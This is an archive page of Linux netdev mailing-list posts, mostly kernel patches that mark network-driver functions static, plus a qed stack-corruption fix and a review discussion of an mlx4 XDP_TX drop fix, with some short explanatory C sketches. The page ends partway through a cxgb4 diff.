date:20160918

Re: [PATCH net-next 0/5] mlx4 misc fixes and improvements

2016-09-18 Thread Tariq Toukan

Hi Dave,

On 16/09/2016 2:21 AM, David Miller wrote:
> From: Tariq Toukan
> Date: Mon, 12 Sep 2016 16:20:11 +0300
>
>> This patchset contains some bug fixes, a cleanup, and small improvements
>> from the team to the mlx4 Eth and core drivers.
>>
>> Series generated against net-next commit:
>> 02154927c115 "net: dsa: bcm_sf2: Get VLAN_PORT_MASK from b53_device"
>>
>> Please push the following patch to -stable >= 4.6 as well:
>> "net/mlx4_core: Fix to clean devlink resources"
>
> Again, coding style fixes and optimizations like branch prediction
> hints are not bug fixes and therefore not appropriate for 'net'.

Yes, I know. Please notice that it was submitted to net-next this time.

Regards,
Tariq

[PATCH net] qed: Fix stack corruption on probe

2016-09-18 Thread Yuval Mintz

Commit fe56b9e6a8d95 ("qed: Add module with basic common support")
has introduced a stack corruption during probe: a local struct holding
data to be sent to the management firmware is filled incorrectly.
The data is written outside of the struct and corrupts the stack.

Fixes: fe56b9e6a8d95 ("qed: Add module with basic common support")
Signed-off-by: Yuval Mintz 
---
Hi Dave,

In case it isn't obvious at first glance, the corruption is due
to the next line in the for-loop, which isn't changed by the patch.

Please consider applying this to `net'.

Thanks,
Yuval
---
 drivers/net/ethernet/qlogic/qed/qed_mcp.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/drivers/net/ethernet/qlogic/qed/qed_mcp.c b/drivers/net/ethernet/qlogic/qed/qed_mcp.c
index a240f26..69f5b04 100644
--- a/drivers/net/ethernet/qlogic/qed/qed_mcp.c
+++ b/drivers/net/ethernet/qlogic/qed/qed_mcp.c
@@ -1153,8 +1153,8 @@ qed_mcp_send_drv_version(struct qed_hwfn *p_hwfn,
p_drv_version = &union_data.drv_version;
p_drv_version->version = p_ver->version;
 
-   for (i = 0; i < MCP_DRV_VER_STR_SIZE - 1; i += 4) {
-   val = cpu_to_be32(p_ver->name[i]);
+   for (i = 0; i < (MCP_DRV_VER_STR_SIZE - 4) / sizeof(u32); i++) {
+   val = cpu_to_be32(p_ver->name[i * sizeof(u32)]);
*(__be32 *)&p_drv_version->name[i * sizeof(u32)] = val;
}
 
-- 
1.9.3
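
The index arithmetic behind the overflow can be sketched in plain C. This is only an illustration, not driver code: the buffer size of 16 bytes is an assumed value (the posting does not state MCP_DRV_VER_STR_SIZE), and the two helper names are hypothetical. Each helper replays one loop header and reports one past the last byte offset that the unchanged store line, `name[i * sizeof(u32)]`, would touch.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Assumed size for illustration only; not taken from the posting. */
#define DEMO_VER_STR_SIZE 16

/* Pre-patch loop header: i advances by 4, yet the store offset is i * 4. */
static size_t demo_old_loop_write_end(size_t str_size)
{
	size_t end = 0;

	assert(str_size >= 4);
	for (size_t i = 0; i < str_size - 1; i += 4) {
		size_t off = i * sizeof(uint32_t);

		end = off + sizeof(uint32_t); /* one past the last byte stored */
	}
	return end;
}

/* Post-patch loop header: i counts 32-bit words, so i * 4 stays in range. */
static size_t demo_new_loop_write_end(size_t str_size)
{
	size_t end = 0;

	assert(str_size >= 4);
	for (size_t i = 0; i < (str_size - 4) / sizeof(uint32_t); i++) {
		size_t off = i * sizeof(uint32_t);

		end = off + sizeof(uint32_t);
	}
	return end;
}
```

Under the assumed size, the old header stores at offsets 0, 16, 32 and 48, well past a 16-byte array, while the new header stores at offsets 0, 4 and 8 only.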

[PATCH] phy: mark lan88xx_suspend() static

2016-09-18 Thread Baoyou Xie

We get 1 warning when building kernel with W=1:
drivers/net/phy/microchip.c:58:5: warning: no previous prototype for 
'lan88xx_suspend' [-Wmissing-prototypes]

In fact, this function is only used in the file in which it is
declared and doesn't need a declaration, so it can be made static.
This patch marks this function as 'static'.

Signed-off-by: Baoyou Xie 
---
 drivers/net/phy/microchip.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/net/phy/microchip.c b/drivers/net/phy/microchip.c
index 15f8206..7c00e50 100644
--- a/drivers/net/phy/microchip.c
+++ b/drivers/net/phy/microchip.c
@@ -55,7 +55,7 @@ static int lan88xx_phy_ack_interrupt(struct phy_device 
*phydev)
return rc < 0 ? rc : 0;
 }
 
-int lan88xx_suspend(struct phy_device *phydev)
+static int lan88xx_suspend(struct phy_device *phydev)
 {
struct lan88xx_priv *priv = phydev->priv;
 
-- 
2.7.4
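
As a rough illustration of the warning class this patch (and the similar ones that follow) addresses, here is a minimal sketch with hypothetical names. A non-static function defined without an earlier prototype triggers -Wmissing-prototypes; giving a file-local helper internal linkage with 'static', or declaring an exported function before defining it, avoids the warning.

```c
#include <assert.h>

/*
 * File-local helper: 'static' gives it internal linkage, so no separate
 * prototype is needed and -Wmissing-prototypes stays quiet.
 */
static int demo_suspend(int irq_enabled)
{
	return irq_enabled ? 0 : -1;
}

/*
 * Exported entry point: the prototype would normally live in a header.
 * It is repeated here only to keep the sketch in one file.
 */
int demo_driver_suspend(int irq_enabled);

int demo_driver_suspend(int irq_enabled)
{
	int rc = demo_suspend(irq_enabled);

	assert(rc == 0 || rc == -1);
	return rc;
}
```

Removing 'static' from demo_suspend() and building with `gcc -Wmissing-prototypes -c` should reproduce a warning of the kind quoted in the commit message.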

Re: [net PATCH V3] mlx4: fix XDP_TX is acting like XDP_PASS on TX ring full

2016-09-18 Thread Tariq Toukan



On 17/09/2016 6:48 PM, Jesper Dangaard Brouer wrote:

The XDP_TX action can fail transmitting the frame in case the TX ring
is full or port is down.  In case of TX failure it should drop the
frame, and not as now call 'break' which is the same as XDP_PASS.

Fixes: 9ecc2d86171a ("net/mlx4_en: add xdp forwarding and data write support")
Signed-off-by: Jesper Dangaard Brouer 

---
Is this goto label inside a switch case too ugly?
I thought about getting "shared code" outside of the switch case, but I 
don't think it will look any better.


Given this label, we can change the goto position by re-ordering the 
cases, swapping between XDP_TX and default so that the XDP_TX is 
immediately followed by XDP_ABORTED and XDP_DROP, and won't need a goto 
operation.
Instead, it will be used in default case, which should not be reached 
anyway. This saves a jump for actual (error) cases.


Something like this:

	act = bpf_prog_run_xdp(xdp_prog, &xdp);
	switch (act) {
	case XDP_PASS:
		break;
	default:
		bpf_warn_invalid_xdp_action(act);
		goto xdp_drop;
	case XDP_TX:
		if (!mlx4_en_xmit_frame(frags, dev,
					length, tx_index,
					&doorbell_pending))
			goto consumed;
		/* fall through: drop on xmit failure */
	case XDP_ABORTED:
	case XDP_DROP:
xdp_drop:
		if (mlx4_en_rx_recycle(ring, frags))
			goto consumed;
		goto next;
	}


Note, this fix has nothing to do with the page-refcnt bug I reported.

  drivers/net/ethernet/mellanox/mlx4/en_rx.c |3 ++-
  1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/drivers/net/ethernet/mellanox/mlx4/en_rx.c b/drivers/net/ethernet/mellanox/mlx4/en_rx.c
index 2040dad8611d..9eadda431965 100644
--- a/drivers/net/ethernet/mellanox/mlx4/en_rx.c
+++ b/drivers/net/ethernet/mellanox/mlx4/en_rx.c
@@ -906,11 +906,12 @@ int mlx4_en_process_rx_cq(struct net_device *dev, struct 
mlx4_en_cq *cq, int bud
length, tx_index,
&doorbell_pending))
goto consumed;
-   break;
+   goto xdp_drop; /* Drop on xmit failure */
default:
bpf_warn_invalid_xdp_action(act);
case XDP_ABORTED:
case XDP_DROP:
+   xdp_drop:
if (mlx4_en_rx_recycle(ring, frags))
goto consumed;
goto next;


But also this way is fine by me.

Regards,
Tariq
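
The reordered switch discussed in this reply can be modelled in a standalone sketch. Everything here is hypothetical scaffolding: the enum values, the result codes and the two boolean inputs stand in for the XDP verdict, the `consumed`/`next` labels, and the outcomes of the transmit and recycle calls. It only aims to show the control flow: a failed transmit falls through into the drop path, and the `goto` is reserved for the unexpected default case.

```c
#include <assert.h>
#include <stdbool.h>

enum demo_action { DEMO_ABORTED, DEMO_DROP, DEMO_PASS, DEMO_TX };
enum demo_result { DEMO_RES_PASS, DEMO_RES_CONSUMED, DEMO_RES_NEXT };

/* xmit_ok / recycle_ok model the transmit and page-recycle outcomes. */
static enum demo_result demo_handle(int act, bool xmit_ok, bool recycle_ok)
{
	switch (act) {
	case DEMO_PASS:
		break;
	default:
		/* unknown verdict: treat it as a drop */
		goto xdp_drop;
	case DEMO_TX:
		if (xmit_ok)
			return DEMO_RES_CONSUMED;
		/* fall through: drop on xmit failure */
	case DEMO_ABORTED:
	case DEMO_DROP:
xdp_drop:
		if (recycle_ok)
			return DEMO_RES_CONSUMED;
		return DEMO_RES_NEXT;
	}

	/* Only the PASS verdict leaves the switch normally. */
	assert(act == DEMO_PASS);
	return DEMO_RES_PASS;
}
```

In this model a TX verdict with a failed transmit never reaches the PASS path, which is the behaviour the fix is after.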

[PATCH] be2net: mark symbols static where possible

2016-09-18 Thread Baoyou Xie

We get 4 warnings when building kernel with W=1:
drivers/net/ethernet/emulex/benet/be_main.c:4368:6: warning: no previous 
prototype for 'be_calculate_pf_pool_rss_tables' [-Wmissing-prototypes]
drivers/net/ethernet/emulex/benet/be_cmds.c:4385:5: warning: no previous 
prototype for 'be_get_nic_pf_num_list' [-Wmissing-prototypes]
drivers/net/ethernet/emulex/benet/be_cmds.c:4537:6: warning: no previous 
prototype for 'be_reset_nic_desc' [-Wmissing-prototypes]
drivers/net/ethernet/emulex/benet/be_cmds.c:4910:5: warning: no previous 
prototype for '__be_cmd_set_logical_link_config' [-Wmissing-prototypes]

In fact, these functions are only used in the file in which they are
declared and don't need a declaration, so they can be made static.
This patch marks these functions as 'static'.

Signed-off-by: Baoyou Xie 
---
 drivers/net/ethernet/emulex/benet/be_cmds.c | 9 +
 drivers/net/ethernet/emulex/benet/be_main.c | 2 +-
 2 files changed, 6 insertions(+), 5 deletions(-)

diff --git a/drivers/net/ethernet/emulex/benet/be_cmds.c b/drivers/net/ethernet/emulex/benet/be_cmds.c
index 15d02da..9cffe48 100644
--- a/drivers/net/ethernet/emulex/benet/be_cmds.c
+++ b/drivers/net/ethernet/emulex/benet/be_cmds.c
@@ -4382,7 +4382,7 @@ err:
 }
 
 /* This routine returns a list of all the NIC PF_nums in the adapter */
-u16 be_get_nic_pf_num_list(u8 *buf, u32 desc_count, u16 *nic_pf_nums)
+static u16 be_get_nic_pf_num_list(u8 *buf, u32 desc_count, u16 *nic_pf_nums)
 {
struct be_res_desc_hdr *hdr = (struct be_res_desc_hdr *)buf;
struct be_pcie_res_desc *pcie = NULL;
@@ -4534,7 +4534,7 @@ static int be_cmd_set_profile_config(struct be_adapter 
*adapter, void *desc,
 }
 
 /* Mark all fields invalid */
-void be_reset_nic_desc(struct be_nic_res_desc *nic)
+static void be_reset_nic_desc(struct be_nic_res_desc *nic)
 {
memset(nic, 0, sizeof(*nic));
nic->unicast_mac_count = 0x;
@@ -4907,8 +4907,9 @@ err:
return status;
 }
 
-int __be_cmd_set_logical_link_config(struct be_adapter *adapter,
-int link_state, int version, u8 domain)
+static int
+__be_cmd_set_logical_link_config(struct be_adapter *adapter,
+int link_state, int version, u8 domain)
 {
struct be_mcc_wrb *wrb;
struct be_cmd_req_set_ll_link *req;
diff --git a/drivers/net/ethernet/emulex/benet/be_main.c b/drivers/net/ethernet/emulex/benet/be_main.c
index 34f63ef..9a94840 100644
--- a/drivers/net/ethernet/emulex/benet/be_main.c
+++ b/drivers/net/ethernet/emulex/benet/be_main.c
@@ -4365,7 +4365,7 @@ static void be_setup_init(struct be_adapter *adapter)
  * for distribution between the VFs. This self-imposed limit will determine the
  * no: of VFs for which RSS can be enabled.
  */
-void be_calculate_pf_pool_rss_tables(struct be_adapter *adapter)
+static void be_calculate_pf_pool_rss_tables(struct be_adapter *adapter)
 {
struct be_port_resources port_res = {0};
u8 rss_tables_on_port;
-- 
2.7.4

[PATCH] mlxsw: spectrum: mark symbols static where possible

2016-09-18 Thread Baoyou Xie

We get 3 warnings when building kernel with W=1:
drivers/net/ethernet/mellanox/mlxsw/spectrum.c:251:29: warning: no previous 
prototype for 'mlxsw_sp_span_entry_find' [-Wmissing-prototypes]
drivers/net/ethernet/mellanox/mlxsw/spectrum.c:265:29: warning: no previous 
prototype for 'mlxsw_sp_span_entry_get' [-Wmissing-prototypes]
drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:1749:6: warning: no 
previous prototype for 'mlxsw_sp_fib_entry_put' [-Wmissing-prototypes]

In fact, these functions are only used in the file in which they are
declared and don't need a declaration, so they can be made static.
This patch marks these functions as 'static'.

Signed-off-by: Baoyou Xie 
---
 drivers/net/ethernet/mellanox/mlxsw/spectrum.c| 6 --
 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c | 4 ++--
 2 files changed, 6 insertions(+), 4 deletions(-)

diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum.c
index 1162e04..e680193 100644
--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum.c
+++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum.c
@@ -248,7 +248,8 @@ static void mlxsw_sp_span_entry_destroy(struct mlxsw_sp 
*mlxsw_sp,
span_entry->used = false;
 }
 
-struct mlxsw_sp_span_entry *mlxsw_sp_span_entry_find(struct mlxsw_sp_port 
*port)
+static struct
+mlxsw_sp_span_entry *mlxsw_sp_span_entry_find(struct mlxsw_sp_port *port)
 {
struct mlxsw_sp *mlxsw_sp = port->mlxsw_sp;
int i;
@@ -262,7 +263,8 @@ struct mlxsw_sp_span_entry *mlxsw_sp_span_entry_find(struct 
mlxsw_sp_port *port)
return NULL;
 }
 
-struct mlxsw_sp_span_entry *mlxsw_sp_span_entry_get(struct mlxsw_sp_port *port)
+static struct
+mlxsw_sp_span_entry *mlxsw_sp_span_entry_get(struct mlxsw_sp_port *port)
 {
struct mlxsw_sp_span_entry *span_entry;
 
diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c
index 352259b..82cdeba 100644
--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c
+++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c
@@ -1746,8 +1746,8 @@ mlxsw_sp_fib_entry_find(struct mlxsw_sp *mlxsw_sp,
 fib4->fi->fib_dev);
 }
 
-void mlxsw_sp_fib_entry_put(struct mlxsw_sp *mlxsw_sp,
-   struct mlxsw_sp_fib_entry *fib_entry)
+static void mlxsw_sp_fib_entry_put(struct mlxsw_sp *mlxsw_sp,
+  struct mlxsw_sp_fib_entry *fib_entry)
 {
struct mlxsw_sp_vr *vr = fib_entry->vr;
 
-- 
2.7.4

[PATCH] net/mlx5: clean function declarations in eswitch.c up

2016-09-18 Thread Baoyou Xie

We get 2 warnings when building kernel with W=1:
drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c:463:5: warning: no 
previous prototype for 'esw_offloads_init' [-Wmissing-prototypes]
drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c:521:6: warning: no 
previous prototype for 'esw_offloads_cleanup' [-Wmissing-prototypes]

In fact, both functions are declared in
drivers/net/ethernet/mellanox/mlx5/core/eswitch.c, but should be
declared in a header file so that other files can see them.

So this patch moves the declarations into
drivers/net/ethernet/mellanox/mlx5/core/eswitch.h

Signed-off-by: Baoyou Xie 
---
 drivers/net/ethernet/mellanox/mlx5/core/eswitch.c | 3 ---
 drivers/net/ethernet/mellanox/mlx5/core/eswitch.h | 3 +++
 2 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
index 1014305..b453cb6 100644
--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
+++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
@@ -81,9 +81,6 @@ enum {
MC_ADDR_CHANGE | \
PROMISC_CHANGE)
 
-int esw_offloads_init(struct mlx5_eswitch *esw, int nvports);
-void esw_offloads_cleanup(struct mlx5_eswitch *esw, int nvports);
-
 static int arm_vport_context_events_cmd(struct mlx5_core_dev *dev, u16 vport,
u32 events_mask)
 {
diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
index a961409..3bc5336 100644
--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
+++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
@@ -201,6 +201,9 @@ struct mlx5_eswitch {
int mode;
 };
 
+void esw_offloads_cleanup(struct mlx5_eswitch *esw, int nvports);
+int esw_offloads_init(struct mlx5_eswitch *esw, int nvports);
+
 /* E-Switch API */
 int mlx5_eswitch_init(struct mlx5_core_dev *dev);
 void mlx5_eswitch_cleanup(struct mlx5_eswitch *esw);
-- 
2.7.4

[PATCH] ixgbe: mark symbols static where possible

2016-09-18 Thread Baoyou Xie

We get 2 warnings when building kernel with W=1:
drivers/net/ethernet/intel/ixgbe/ixgbe_x550.c:2128:5: warning: no previous 
prototype for 'ixgbe_led_on_t_x550em' [-Wmissing-prototypes]
drivers/net/ethernet/intel/ixgbe/ixgbe_x550.c:2150:5: warning: no previous 
prototype for 'ixgbe_led_off_t_x550em' [-Wmissing-prototypes]

In fact, these functions are only used in the file in which they are
declared and don't need a declaration, so they can be made static.
This patch marks these functions as 'static'.

Signed-off-by: Baoyou Xie 
---
 drivers/net/ethernet/intel/ixgbe/ixgbe_x550.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_x550.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_x550.c
index e092a89..dec8b11 100644
--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_x550.c
+++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_x550.c
@@ -2125,7 +2125,7 @@ static s32 ixgbe_reset_phy_t_X550em(struct ixgbe_hw *hw)
  *  @hw: pointer to hardware structure
  *  @led_idx: led number to turn on
  **/
-s32 ixgbe_led_on_t_x550em(struct ixgbe_hw *hw, u32 led_idx)
+static s32 ixgbe_led_on_t_x550em(struct ixgbe_hw *hw, u32 led_idx)
 {
u16 phy_data;
 
@@ -2147,7 +2147,7 @@ s32 ixgbe_led_on_t_x550em(struct ixgbe_hw *hw, u32 
led_idx)
  *  @hw: pointer to hardware structure
  *  @led_idx: led number to turn off
  **/
-s32 ixgbe_led_off_t_x550em(struct ixgbe_hw *hw, u32 led_idx)
+static s32 ixgbe_led_off_t_x550em(struct ixgbe_hw *hw, u32 led_idx)
 {
u16 phy_data;
 
-- 
2.7.4

[PATCH] igb: mark igb_rxnfc_write_vlan_prio_filter() static

2016-09-18 Thread Baoyou Xie

We get 1 warning when building kernel with W=1:
drivers/net/ethernet/intel/igb/igb_ethtool.c:2707:5: warning: no previous 
prototype for 'igb_rxnfc_write_vlan_prio_filter' [-Wmissing-prototypes]

In fact, this function is only used in the file in which it is
declared and doesn't need a declaration, so it can be made static.
This patch marks this function as 'static'.

Signed-off-by: Baoyou Xie 
---
 drivers/net/ethernet/intel/igb/igb_ethtool.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/drivers/net/ethernet/intel/igb/igb_ethtool.c b/drivers/net/ethernet/intel/igb/igb_ethtool.c
index 0c33eca..737b664 100644
--- a/drivers/net/ethernet/intel/igb/igb_ethtool.c
+++ b/drivers/net/ethernet/intel/igb/igb_ethtool.c
@@ -2704,8 +2704,8 @@ static int igb_rxnfc_write_etype_filter(struct 
igb_adapter *adapter,
return 0;
 }
 
-int igb_rxnfc_write_vlan_prio_filter(struct igb_adapter *adapter,
-struct igb_nfc_filter *input)
+static int igb_rxnfc_write_vlan_prio_filter(struct igb_adapter *adapter,
+   struct igb_nfc_filter *input)
 {
struct e1000_hw *hw = &adapter->hw;
u8 vlan_priority;
-- 
2.7.4

[PATCH] net: hns: mark symbols static where possible

2016-09-18 Thread Baoyou Xie

We get a few warnings when building kernel with W=1:
drivers/net/ethernet/hisilicon/hisi_femac.c:943:5: warning: no previous 
prototype for 'hisi_femac_drv_suspend' [-Wmissing-prototypes]
drivers/net/ethernet/hisilicon/hisi_femac.c:960:5: warning: no previous 
prototype for 'hisi_femac_drv_resume' [-Wmissing-prototypes]
drivers/net/ethernet/hisilicon/hns/hns_ae_adapt.c:76:21: warning: no previous 
prototype for 'hns_ae_get_handle' [-Wmissing-prototypes]


In fact, these functions are only used in the file in which they are
declared and don't need a declaration, so they can be made static.
This patch marks these functions as 'static'.

Signed-off-by: Baoyou Xie 
---
 drivers/net/ethernet/hisilicon/hisi_femac.c|  6 ++---
 drivers/net/ethernet/hisilicon/hns/hns_ae_adapt.c  | 30 +++---
 drivers/net/ethernet/hisilicon/hns/hns_dsaf_gmac.c |  2 +-
 drivers/net/ethernet/hisilicon/hns/hns_dsaf_mac.c  |  8 +++---
 drivers/net/ethernet/hisilicon/hns/hns_dsaf_main.c |  7 ++---
 drivers/net/ethernet/hisilicon/hns/hns_dsaf_misc.c |  6 ++---
 drivers/net/ethernet/hisilicon/hns/hns_dsaf_ppe.c  |  7 ++---
 drivers/net/ethernet/hisilicon/hns/hns_dsaf_rcb.c  |  4 +--
 .../net/ethernet/hisilicon/hns/hns_dsaf_xgmac.c|  2 +-
 drivers/net/ethernet/hisilicon/hns/hns_enet.c  | 12 -
 drivers/net/ethernet/hisilicon/hns/hns_ethtool.c   | 24 +
 11 files changed, 57 insertions(+), 51 deletions(-)

diff --git a/drivers/net/ethernet/hisilicon/hisi_femac.c b/drivers/net/ethernet/hisilicon/hisi_femac.c
index ca68e22..ced1859 100644
--- a/drivers/net/ethernet/hisilicon/hisi_femac.c
+++ b/drivers/net/ethernet/hisilicon/hisi_femac.c
@@ -940,8 +940,8 @@ static int hisi_femac_drv_remove(struct platform_device 
*pdev)
 }
 
 #ifdef CONFIG_PM
-int hisi_femac_drv_suspend(struct platform_device *pdev,
-  pm_message_t state)
+static int hisi_femac_drv_suspend(struct platform_device *pdev,
+ pm_message_t state)
 {
struct net_device *ndev = platform_get_drvdata(pdev);
struct hisi_femac_priv *priv = netdev_priv(ndev);
@@ -957,7 +957,7 @@ int hisi_femac_drv_suspend(struct platform_device *pdev,
return 0;
 }
 
-int hisi_femac_drv_resume(struct platform_device *pdev)
+static int hisi_femac_drv_resume(struct platform_device *pdev)
 {
struct net_device *ndev = platform_get_drvdata(pdev);
struct hisi_femac_priv *priv = netdev_priv(ndev);
diff --git a/drivers/net/ethernet/hisilicon/hns/hns_ae_adapt.c b/drivers/net/ethernet/hisilicon/hns/hns_ae_adapt.c
index e28d960..a1150e9 100644
--- a/drivers/net/ethernet/hisilicon/hns/hns_ae_adapt.c
+++ b/drivers/net/ethernet/hisilicon/hns/hns_ae_adapt.c
@@ -73,8 +73,8 @@ static struct ring_pair_cb *hns_ae_get_ring_pair(struct 
hnae_queue *q)
return container_of(q, struct ring_pair_cb, q);
 }
 
-struct hnae_handle *hns_ae_get_handle(struct hnae_ae_dev *dev,
- u32 port_id)
+static struct hnae_handle *hns_ae_get_handle(struct hnae_ae_dev *dev,
+u32 port_id)
 {
int vfnum_per_port;
int qnum_per_vf;
@@ -271,7 +271,7 @@ static int hns_ae_start(struct hnae_handle *handle)
return 0;
 }
 
-void hns_ae_stop(struct hnae_handle *handle)
+static void hns_ae_stop(struct hnae_handle *handle)
 {
struct hns_mac_cb *mac_cb = hns_get_mac_cb(handle);
 
@@ -299,7 +299,7 @@ static void hns_ae_reset(struct hnae_handle *handle)
}
 }
 
-void hns_ae_toggle_ring_irq(struct hnae_ring *ring, u32 mask)
+static void hns_ae_toggle_ring_irq(struct hnae_ring *ring, u32 mask)
 {
u32 flag;
 
@@ -487,8 +487,8 @@ static void hns_ae_get_coalesce_range(struct hnae_handle 
*handle,
*rx_usecs_high  = HNS_RCB_MAX_COALESCED_USECS;
 }
 
-void hns_ae_update_stats(struct hnae_handle *handle,
-struct net_device_stats *net_stats)
+static void hns_ae_update_stats(struct hnae_handle *handle,
+   struct net_device_stats *net_stats)
 {
int port;
int idx;
@@ -570,7 +570,7 @@ void hns_ae_update_stats(struct hnae_handle *handle,
net_stats->multicast = mac_cb->hw_stats.rx_mc_pkts;
 }
 
-void hns_ae_get_stats(struct hnae_handle *handle, u64 *data)
+static void hns_ae_get_stats(struct hnae_handle *handle, u64 *data)
 {
int idx;
struct hns_mac_cb *mac_cb;
@@ -602,8 +602,8 @@ void hns_ae_get_stats(struct hnae_handle *handle, u64 *data)
hns_dsaf_get_stats(vf_cb->dsaf_dev, p, vf_cb->port_index);
 }
 
-void hns_ae_get_strings(struct hnae_handle *handle,
-   u32 stringset, u8 *data)
+static void hns_ae_get_strings(struct hnae_handle *handle,
+  u32 stringset, u8 *data)
 {
int port;
int idx;
@@ -635,7 +635,7 @@ void hns_ae_get_strings(struct hnae_handle *handle,
hns_dsaf_get_strings(stringset, p, port, dsaf

Re: [PATCH] mlxsw: spectrum: mark symbols static where possible

2016-09-18 Thread Ido Schimmel

Hi,

On Sun, Sep 18, 2016 at 04:39:47PM +0800, Baoyou Xie wrote:
> We get 3 warnings when building kernel with W=1:
> drivers/net/ethernet/mellanox/mlxsw/spectrum.c:251:29: warning: no previous 
> prototype for 'mlxsw_sp_span_entry_find' [-Wmissing-prototypes]
> drivers/net/ethernet/mellanox/mlxsw/spectrum.c:265:29: warning: no previous 
> prototype for 'mlxsw_sp_span_entry_get' [-Wmissing-prototypes]
> drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:1749:6: warning: no 
> previous prototype for 'mlxsw_sp_fib_entry_put' [-Wmissing-prototypes]
> 
> In fact, these functions are only used in the file in which they are
> declared and don't need a declaration, so they can be made static.
> This patch marks these functions as 'static'.
> 
> Signed-off-by: Baoyou Xie 

Thanks for the patch! We already have a patch that fixes sparse warnings
(including these) queued up. See:
https://github.com/jpirko/linux_mlxsw/commit/4800ed89f5da55a42a173d5cf9225d4fbb8a96bd

But since we already have one patch under review we've yet to submit it.
https://patchwork.ozlabs.org/patch/670846/

Do you mind dropping this and instead let our patch (with the rest of
the fixes) go through?

Thanks, Ido.

[PATCH] net: hns: add function declarations in hns_dsaf_mac.h

2016-09-18 Thread Baoyou Xie

We get 2 warnings when building kernel with W=1:
drivers/net/ethernet/hisilicon/hns/hns_dsaf_misc.c:246:6: warning: no previous 
prototype for 'hns_dsaf_srst_chns' [-Wmissing-prototypes]
drivers/net/ethernet/hisilicon/hns/hns_dsaf_misc.c:276:6: warning: no previous 
prototype for 'hns_dsaf_roce_srst' [-Wmissing-prototypes]

In fact, these two functions are not declared in any file, but should
be declared in a header file so that other files can see them.

So this patch adds the declarations into
drivers/net/ethernet/hisilicon/hns/hns_dsaf_mac.h

Signed-off-by: Baoyou Xie 
---
 drivers/net/ethernet/hisilicon/hns/hns_dsaf_mac.h | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/drivers/net/ethernet/hisilicon/hns/hns_dsaf_mac.h b/drivers/net/ethernet/hisilicon/hns/hns_dsaf_mac.h
index 4cbdf14..31f6505 100644
--- a/drivers/net/ethernet/hisilicon/hns/hns_dsaf_mac.h
+++ b/drivers/net/ethernet/hisilicon/hns/hns_dsaf_mac.h
@@ -462,4 +462,6 @@ int hns_cpld_led_set_id(struct hns_mac_cb *mac_cb,
enum hnae_led_state status);
 void hns_mac_set_promisc(struct hns_mac_cb *mac_cb, u8 en);
 
+void hns_dsaf_srst_chns(struct dsaf_device *dsaf_dev, u32 msk, bool dereset);
+void hns_dsaf_roce_srst(struct dsaf_device *dsaf_dev, bool dereset);
 #endif /* _HNS_DSAF_MAC_H */
-- 
2.7.4

[PATCH] cxgb4: mark symbols static where possible

2016-09-18 Thread Baoyou Xie

We get a few warnings when building kernel with W=1:
drivers/net/ethernet/chelsio/cxgb4/cxgb4_uld.c:178:5: warning: no previous 
prototype for 'setup_sge_queues_uld' [-Wmissing-prototypes]
drivers/net/ethernet/chelsio/cxgb4/cxgb4_uld.c:205:6: warning: no previous 
prototype for 'free_sge_queues_uld' [-Wmissing-prototypes]


In fact, these functions are only used in the file in which they are
declared and don't need a declaration, so they can be made static.
This patch marks these functions as 'static'.

Signed-off-by: Baoyou Xie 
---
 drivers/net/ethernet/chelsio/cxgb4/cxgb4_uld.c | 23 +--
 1 file changed, 13 insertions(+), 10 deletions(-)

diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_uld.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_uld.c
index 5d402ba..fb40ddb 100644
--- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_uld.c
+++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_uld.c
@@ -175,7 +175,8 @@ freeout:
return err;
 }
 
-int setup_sge_queues_uld(struct adapter *adap, unsigned int uld_type, bool lro)
+static int
+setup_sge_queues_uld(struct adapter *adap, unsigned int uld_type, bool lro)
 {
struct sge_uld_rxq_info *rxq_info = adap->sge.uld_rxq_info[uld_type];
 
@@ -202,7 +203,7 @@ static void t4_free_uld_rxqs(struct adapter *adap, int n,
}
 }
 
-void free_sge_queues_uld(struct adapter *adap, unsigned int uld_type)
+static void free_sge_queues_uld(struct adapter *adap, unsigned int uld_type)
 {
struct sge_uld_rxq_info *rxq_info = adap->sge.uld_rxq_info[uld_type];
 
@@ -214,8 +215,8 @@ void free_sge_queues_uld(struct adapter *adap, unsigned int 
uld_type)
kfree(rxq_info->msix_tbl);
 }
 
-int cfg_queues_uld(struct adapter *adap, unsigned int uld_type,
-  const struct cxgb4_pci_uld_info *uld_info)
+static int cfg_queues_uld(struct adapter *adap, unsigned int uld_type,
+ const struct cxgb4_pci_uld_info *uld_info)
 {
struct sge *s = &adap->sge;
